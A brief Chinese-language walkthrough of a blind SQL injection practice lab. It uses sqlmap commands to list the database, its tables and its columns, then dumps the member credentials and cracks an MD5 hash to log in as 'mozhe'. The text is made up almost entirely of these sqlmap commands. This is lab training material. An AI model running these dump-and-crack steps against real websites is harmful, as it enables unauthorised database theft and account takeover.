布尔盲注
打开靶场点击访问
工具用sqlmap,一般kali虚拟机自带
1:在命令行里输入:
sqlmap -u 注入点 --current-db
点回车键会出现 数据库名是 stormgroup
只有出现这个数据库才可执行下个命令
sqlmap -u 注入点-D 获取到的数据名 --tables
会有member和notice
就是下图3: 获取完之后sqlmap -u 注入点 -D
获取到的数据库名 -T 获取到的表名 --columns 获取到的列名分别是 name password status
库名和表名是刚才获取的如下图
4: sqlmap -u 注入点-D 获取到的数据库名 -T 获取到的表名 -C 要获取值指定列 --dump 获取到的值如下图
有两组数据只有一组是可以用的
这是个MD5密码,解密出来的数据是靶场密码账号是爆出来的mozhe